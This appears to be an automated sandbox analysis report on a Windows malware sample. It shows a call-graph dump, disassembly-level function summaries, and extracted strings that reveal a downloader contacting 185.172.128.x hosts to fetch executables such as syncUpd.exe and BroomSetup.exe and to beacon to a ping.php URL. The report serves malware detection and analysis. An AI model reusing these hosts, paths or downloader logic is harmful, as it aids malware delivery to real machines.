422950 45840->45843 45844 422940 GetLastError 45840->45844 45847 417a45 std::_Locinfo::_Locinfo_ctor 21 API calls 45843->45847 45906 41234b 20 API calls 3 library calls 45844->45906 45845 41a310 45845->45822 45854 41a36b 45845->45854 45848 422958 45847->45848 45849 42295f MultiByteToWideChar 45848->45849 45851 422980 45848->45851 45849->45851 45852 422974 GetLastError 45849->45852 45850 41629a _free 20 API calls 45850->45845 45851->45850 45907 41234b 20 API calls 3 library calls 45852->45907 45908 41a0ce 45854->45908 45857 41a3b6 45926 41e7d7 45857->45926 45858 41a39d 45940 41236e 20 API calls _abort 45858->45940 45861 41a3bb 45862 41a3c4 45861->45862 45863 41a3db 45861->45863 45942 41236e 20 API calls _abort 45862->45942 45939 41a039 CreateFileW 45863->45939 45867 41a338 45867->45826 45868 41a3c9 45943 412381 20 API calls _abort 45868->45943 45870 41a491 GetFileType 45871 41a4e3 45870->45871 45872 41a49c GetLastError 45870->45872 45948 41e720 21 API calls 3 library calls 45871->45948 45946 41234b 20 API calls 3 library calls 45872->45946 45873 41a3a2 45941 412381 20 API calls _abort 45873->45941 45874 41a466 GetLastError 45945 41234b 20 API calls 3 library calls 45874->45945 45877 41a414 45877->45870 45877->45874 45944 41a039 CreateFileW 45877->45944 45878 41a4aa CloseHandle 45878->45873 45882 41a4d3 45878->45882 45881 41a459 45881->45870 45881->45874 45947 412381 20 API calls _abort 45882->45947 45883 41a504 45885 41a550 45883->45885 45949 41a24a 72 API calls 5 library calls 45883->45949 45890 41a57d 45885->45890 45950 419dec 72 API calls 5 library calls 45885->45950 45886 41a4d8 45886->45873 45889 41a576 45889->45890 45891 41a58e 45889->45891 45892 4163fd __wsopen_s 29 API calls 45890->45892 45891->45867 45893 41a60c CloseHandle 45891->45893 45892->45867 45951 41a039 CreateFileW 45893->45951 45895 41a637 45896 41a641 GetLastError 45895->45896 45897 41a66d 45895->45897 45952 41234b 20 API calls 3 library calls 45896->45952 45897->45867 45899 41a64d 45953 41e8e9 21 API calls 3 library calls 45899->45953 45901->45838 45902->45845 45903->45839 45904->45845 45905->45840 45906->45845 45907->45851 45909 41a0ef 45908->45909 45914 41a109 45908->45914 45909->45914 45961 412381 20 API calls _abort 45909->45961 45912 41a0fe 45962 410905 26 API calls _Deallocate 45912->45962 45954 41a05e 45914->45954 45915 41a141 45916 41a170 45915->45916 45963 412381 20 API calls _abort 45915->45963 45924 41a1c3 45916->45924 45965 413b67 26 API calls 2 library calls 45916->45965 45919 41a1be 45921 41a23d 45919->45921 45919->45924 45920 41a165 45964 410905 26 API calls _Deallocate 45920->45964 45966 410932 11 API calls _abort 45921->45966 45924->45857 45924->45858 45925 41a249 45927 41e7e3 BuildCatchObjectHelperInternal 45926->45927 45969 411a06 EnterCriticalSection 45927->45969 45929 41e7ea 45931 41e80f 45929->45931 45935 41e87d EnterCriticalSection 45929->45935 45937 41e831 45929->45937 45973 41e5b6 21 API calls 2 library calls 45931->45973 45933 41e814 45933->45937 45974 41e6fd EnterCriticalSection 45933->45974 45934 41e85a std::_Xfsopen 45934->45861 45935->45937 45938 41e88a LeaveCriticalSection 45935->45938 45970 41e8e0 45937->45970 45938->45929 45939->45877 45940->45873 45941->45867 45942->45868 45943->45873 45944->45881 45945->45873 45946->45878 45947->45886 45948->45883 45949->45885 45950->45889 45951->45895 45952->45899 45953->45897 45956 41a076 45954->45956 45955 41a091 45955->45915 45956->45955 45967 412381 20 API calls _abort 45956->45967 45958 41a0b5 45968 410905 26 API calls _Deallocate 45958->45968 45960 41a0c0 45960->45915 45961->45912 45962->45914 45963->45920 45964->45916 45965->45919 45966->45925 45967->45958 45968->45960 45969->45929 45975 411a4e LeaveCriticalSection 45970->45975 45972 41e8e7 45972->45934 45973->45933 45974->45937 45975->45972 45976 418c536 45977 418c545 45976->45977 45980 418ccd6 45977->45980 45982 418ccf1 45980->45982 45981 418ccfa CreateToolhelp32Snapshot 45981->45982 45983 418cd16 Module32First 45981->45983 45982->45981 45982->45983 45984 418cd25 45983->45984 45986 418c54e 45983->45986 45987 418c995 45984->45987 45988 418c9c0 45987->45988 45989 418c9d1 VirtualAlloc 45988->45989 45990 418ca09 45988->45990 45989->45990 45991 41870f 45992 41871b BuildCatchObjectHelperInternal 45991->45992 45993 418727 45992->45993 45994 41873e 45992->45994 46025 412381 20 API calls _abort 45993->46025 46004 40e81d EnterCriticalSection 45994->46004 45997 41872c 46026 410905 26 API calls _Deallocate 45997->46026 45998 41874e 46005 41878b 45998->46005 46001 41875a 46027 418781 LeaveCriticalSection __fread_nolock 46001->46027 46003 418737 std::_Xfsopen 46004->45998 46006 4187b3 46005->46006 46007 418799 46005->46007 46009 4154e8 _Xfiopen 26 API calls 46006->46009 46031 412381 20 API calls _abort 46007->46031 46011 4187bc 46009->46011 46010 41879e 46032 410905 26 API calls _Deallocate 46010->46032 46028 4197e5 46011->46028 46015 4188c0 46017 4188cd 46015->46017 46021 418873 46015->46021 46016 418844 46019 418861 46016->46019 46016->46021 46034 412381 20 API calls _abort 46017->46034 46033 418aa4 31 API calls 3 library calls 46019->46033 46022 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46021->46022 46035 418920 30 API calls 2 library calls 46021->46035 46022->46001 46023 41886b 46023->46022 46025->45997 46026->46003 46027->46003 46036 419662 46028->46036 46030 4187d8 46030->46015 46030->46016 46030->46022 46031->46010 46032->46022 46033->46023 46034->46022 46035->46022 46037 41966e BuildCatchObjectHelperInternal 46036->46037 46038 419676 46037->46038 46039 41968e 46037->46039 46062 41236e 20 API calls _abort 46038->46062 46041 419742 46039->46041 46046 4196c6 46039->46046 46067 41236e 20 API calls _abort 46041->46067 46042 41967b 46063 412381 20 API calls _abort 46042->46063 46045 419747 46068 412381 20 API calls _abort 46045->46068 46061 41e6fd EnterCriticalSection 46046->46061 46047 419683 std::_Xfsopen 46047->46030 46050 41974f 46069 410905 26 API calls _Deallocate 46050->46069 46051 4196cc 46053 4196f0 46051->46053 46054 419705 46051->46054 46064 412381 20 API calls _abort 46053->46064 46055 419767 _Xfiopen 28 API calls 46054->46055 46057 419700 46055->46057 46066 41973a LeaveCriticalSection __wsopen_s 46057->46066 46058 4196f5 46065 41236e 20 API calls _abort 46058->46065 46061->46051 46062->46042 46063->46047 46064->46058 46065->46057 46066->46047 46067->46045 46068->46050 46069->46047

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00424B3E Relevance: 53.7, APIs: 1, Strings: 29, Instructions: 1213COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 424b3e-424eb5 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 426354 call 401b1e GetModuleFileNameA call 401b1e call 425ee2 call 401a0c call 403491 * 3 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c 129 424f07-425842 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42612f call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 14 call 40197c call 403491 * 12 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 0->129 130 424eb7 0->130 499 425e40-425eb7 call 4019f8 * 2 call 401ae8 call 4019f8 call 401ae8 call 401a11 call 401ae8 * 4 129->499 500 425848-425893 call 40b5a0 call 410c91 call 4262d2 call 426217 129->500 131 424ef2-424ef7 130->131 132 424ec1-424ec6 130->132 133 424ed6-424edb 130->133 134 424ee4-424ee9 130->134 135 424eeb-424ef0 130->135 136 424ec8-424ecd 130->136 137 424ef9 130->137 138 424ebe-424ebf 130->138 139 424ecf-424ed4 130->139 140 424edd-424ee2 130->140 142 424efe-424f02 call 401adf 131->142 132->142 133->142 134->142 135->142 136->142 137->142 138->142 139->142 140->142 142->129 518 425895-4258a7 call 401b1e call 426260 500->518 519 4258af-425ac6 call 40ff7e call 403491 * 16 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 500->519 531 4258ac 518->531 613 425bcf-425db7 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 519->613 614 425acc-425ba6 call 40b5a0 call 403491 * 12 call 40197c call 42631a call 426217 519->614 531->519 729 425e2b-425e3b call 4019f8 * 2 613->729 730 425db9-425e02 call 40b5a0 call 410c91 call 4262d2 call 426217 613->730 679 425bc2-425bc9 call 40ff7e 614->679 680 425ba8-425bbf call 401b1e call 426260 614->680 686 425bce 679->686 680->679 686->613 729->499 742 425e04-425e16 call 401b1e call 426260 730->742 743 425e1e-425e25 call 40ff7e 730->743 749 425e1b 742->749 746 425e2a 743->746 746->729 749->743
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
                                                                                                                                                                                                                                    • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
                                                                                                                                                                                                                                  • API String ID: 2531350358-4166474000
                                                                                                                                                                                                                                  • Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                  • Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1697 4139e7-4139f3 call 4177fa 1700 413a15-413a21 call 413a6c ExitProcess 1697->1700 1701 4139f5-413a03 GetPEB 1697->1701 1701->1700 1703 413a05-413a0f GetCurrentProcess TerminateProcess 1701->1703 1703->1700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                  • Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426504 Relevance: 48.4, APIs: 16, Strings: 11, Instructions: 1148networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 750 426504-427062 call 4275a4 call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 1223 427068-42706b 750->1223 1224 42717c-42719d call 401aa1 WSAStartup 750->1224 1223->1224 1226 427071-427177 call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 1223->1226 1229 4271a3-4271b9 socket 1224->1229 1230 427571 1224->1230 1226->1224 1233 4271d0-4271e3 call 401a67 gethostbyname 1229->1233 1234 4271bb-4271cb call 40ff7e WSACleanup 1229->1234 1232 427574-42757d call 40ff7e 1230->1232 1246 42757e-427585 WSACleanup closesocket 1232->1246 1233->1232 1244 4271e9-427225 call 40aaa0 htons connect 1233->1244 1247 42758b-4275a3 call 401ae8 1234->1247 1244->1232 1254 42722b-427247 call 403da5 call 401a67 send 1244->1254 1246->1247 1254->1232 1264 42724d-427251 1254->1264 1266 427253-427263 send 1264->1266 1267 427269-42728d call 40b5a0 1264->1267 1266->1232 1266->1267 1274 42728f-4272a3 recv 1267->1274 1274->1232 1276 4272a9-4272ae 1274->1276 1278 4273b6-4273bf 1276->1278 1279 4272b4-4272bc 1276->1279 1278->1232 1281 4273c5-4273c8 1278->1281 1279->1278 1280 4272c2-4272ca 1279->1280 1280->1278 1284 4272d0-4272db 1280->1284 1281->1274 1286 427300-427309 1284->1286 1287 4272dd-4272f2 call 412faf 1284->1287 1290 42730c-427311 1286->1290 1287->1232 1295 4272f8-4272fb 1287->1295 1290->1290 1293 427313-427315 1290->1293 1296 42731b-427330 call 403a0c 1293->1296 1297 4273cd-4273d2 1293->1297 1299 4273ad-4273b3 1295->1299 1296->1299 1312 427332-427352 call 412faf 1296->1312 1301 4273d4-4273d8 1297->1301 1302 4273df-4273e3 1297->1302 1299->1278 1304 4273e9-427405 call 426127 1301->1304 1307 4273da 1301->1307 1303 427515-427517 1302->1303 1302->1304 1310 42755b-427568 call 426127 1303->1310 1311 427519-427532 call 426127 1303->1311 1319 427408-42740a 1304->1319 1307->1232 1323 42756a-42756f 1310->1323 1326 427535-427548 recv 1311->1326 1327 427376-42738e call 412faf 1312->1327 1328 427354-42736e call 41196d 1312->1328 1324 42740d-427421 recv 1319->1324 1323->1246 1324->1232 1331 427427-42742c 1324->1331 1326->1232 1333 42754a-427557 1326->1333 1327->1299 1341 427390-4273aa call 412faf 1327->1341 1328->1232 1340 427374 1328->1340 1336 427432-427437 1331->1336 1337 4274fb-427502 1331->1337 1333->1326 1339 427559 1333->1339 1336->1337 1342 42743d-427442 1336->1342 1337->1324 1343 427508 1337->1343 1339->1323 1340->1299 1341->1299 1342->1337 1346 427448-427469 call 41196d 1342->1346 1343->1232 1346->1232 1354 42746f-427471 1346->1354 1354->1232 1356 427477 1354->1356 1358 42750a-427513 1356->1358 1359 42747d-427489 1356->1359 1358->1323 1361 4274a5-4274a7 1359->1361 1362 42748b-4274a2 call 42611d 1359->1362 1363 4274aa-4274c0 recv 1361->1363 1362->1361 1363->1232 1367 4274c6-4274d3 1363->1367 1367->1363 1368 4274d5-4274e7 recv 1367->1368 1368->1232 1369 4274ed-4274f6 1368->1369 1369->1319
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00426509
                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00427195
                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004271C5
                                                                                                                                                                                                                                  • gethostbyname.WS2_32(00000000), ref: 004271D9
                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0042720B
                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 0042721C
                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
                                                                                                                                                                                                                                  • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
                                                                                                                                                                                                                                  • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
                                                                                                                                                                                                                                  • recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,?,00000000), ref: 00427540
                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 0042757E
                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00427585
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                  • String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                  • API String ID: 791229064-3676584321
                                                                                                                                                                                                                                  • Opcode ID: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
                                                                                                                                                                                                                                  • Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A36B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1370 41a36b-41a39b call 41a0ce 1373 41a3b6-41a3c2 call 41e7d7 1370->1373 1374 41a39d-41a3a8 call 41236e 1370->1374 1379 41a3c4-41a3d9 call 41236e call 412381 1373->1379 1380 41a3db-41a424 call 41a039 1373->1380 1381 41a3aa-41a3b1 call 412381 1374->1381 1379->1381 1390 41a491-41a49a GetFileType 1380->1390 1391 41a426-41a42f 1380->1391 1388 41a68d-41a693 1381->1388 1392 41a4e3-41a4e6 1390->1392 1393 41a49c-41a4cd GetLastError call 41234b CloseHandle 1390->1393 1395 41a431-41a435 1391->1395 1396 41a466-41a48c GetLastError call 41234b 1391->1396 1399 41a4e8-41a4ed 1392->1399 1400 41a4ef-41a4f5 1392->1400 1393->1381 1409 41a4d3-41a4de call 412381 1393->1409 1395->1396 1401 41a437-41a464 call 41a039 1395->1401 1396->1381 1404 41a4f9-41a547 call 41e720 1399->1404 1400->1404 1405 41a4f7 1400->1405 1401->1390 1401->1396 1412 41a557-41a57b call 419dec 1404->1412 1413 41a549-41a555 call 41a24a 1404->1413 1405->1404 1409->1381 1420 41a57d 1412->1420 1421 41a58e-41a5d1 1412->1421 1413->1412 1419 41a57f-41a589 call 4163fd 1413->1419 1419->1388 1420->1419 1423 41a5d3-41a5d7 1421->1423 1424 41a5f2-41a600 1421->1424 1423->1424 1428 41a5d9-41a5ed 1423->1428 1425 41a606-41a60a 1424->1425 1426 41a68b 1424->1426 1425->1426 1429 41a60c-41a63f CloseHandle call 41a039 1425->1429 1426->1388 1428->1424 1432 41a641-41a66d GetLastError call 41234b call 41e8e9 1429->1432 1433 41a673-41a687 1429->1433 1432->1433 1433->1426
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A47F
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A486
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0041A492
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A49C
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A4A5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041A4C5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0041A60F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A641
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A648
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1438 4192ad-4192bd 1439 4192d7-4192d9 1438->1439 1440 4192bf-4192d2 call 41236e call 412381 1438->1440 1442 419641-41964e call 41236e call 412381 1439->1442 1443 4192df-4192e5 1439->1443 1456 419659 1440->1456 1461 419654 call 410905 1442->1461 1443->1442 1446 4192eb-419316 1443->1446 1446->1442 1449 41931c-419325 1446->1449 1452 419327-41933a call 41236e call 412381 1449->1452 1453 41933f-419341 1449->1453 1452->1461 1454 419347-41934b 1453->1454 1455 41963d-41963f 1453->1455 1454->1455 1459 419351-419355 1454->1459 1460 41965c-419661 1455->1460 1456->1460 1459->1452 1464 419357-41936e 1459->1464 1461->1456 1467 419370-419373 1464->1467 1468 41938b-419394 1464->1468 1469 419375-41937b 1467->1469 1470 41937d-419386 1467->1470 1471 4193b2-4193bc 1468->1471 1472 419396-4193ad call 41236e call 412381 call 410905 1468->1472 1469->1470 1469->1472 1475 419427-419441 1470->1475 1473 4193c3-4193e1 call 417a45 call 41629a * 2 1471->1473 1474 4193be-4193c0 1471->1474 1500 419574 1472->1500 1508 4193e3-4193f9 call 412381 call 41236e 1473->1508 1509 4193fe-419424 call 419800 1473->1509 1474->1473 1477 419515-41951e call 421229 1475->1477 1478 419447-419457 1475->1478 1491 419591 1477->1491 1492 419520-419532 1477->1492 1478->1477 1481 41945d-41945f 1478->1481 1481->1477 1485 419465-41948b 1481->1485 1485->1477 1489 419491-4194a4 1485->1489 1489->1477 1496 4194a6-4194a8 1489->1496 1498 419595-4195ad ReadFile 1491->1498 1492->1491 1494 419534-419543 GetConsoleMode 1492->1494 1494->1491 1499 419545-419549 1494->1499 1496->1477 1501 4194aa-4194d5 1496->1501 1503 419609-419614 GetLastError 1498->1503 1504 4195af-4195b5 1498->1504 1499->1498 1505 41954b-419565 ReadConsoleW 1499->1505 1506 419577-419581 call 41629a 1500->1506 1501->1477 1507 4194d7-4194ea 1501->1507 1510 419616-419628 call 412381 call 41236e 1503->1510 1511 41962d-419630 1503->1511 1504->1503 1512 4195b7 1504->1512 1515 419567 GetLastError 1505->1515 1516 419586-41958f 1505->1516 1506->1460 1507->1477 1520 4194ec-4194ee 1507->1520 1508->1500 1509->1475 1510->1500 1517 419636-419638 1511->1517 1518 41956d-419573 call 41234b 1511->1518 1514 4195ba-4195cc 1512->1514 1514->1506 1525 4195ce-4195d2 1514->1525 1515->1518 1516->1514 1517->1506 1518->1500 1520->1477 1528 4194f0-419510 1520->1528 1531 4195d4-4195e4 call 418fc9 1525->1531 1532 4195eb-4195f6 1525->1532 1528->1477 1543 4195e7-4195e9 1531->1543 1537 419602-419607 call 418e09 1532->1537 1538 4195f8 call 419119 1532->1538 1544 4195fd-419600 1537->1544 1538->1544 1543->1506 1544->1543
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                  • Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
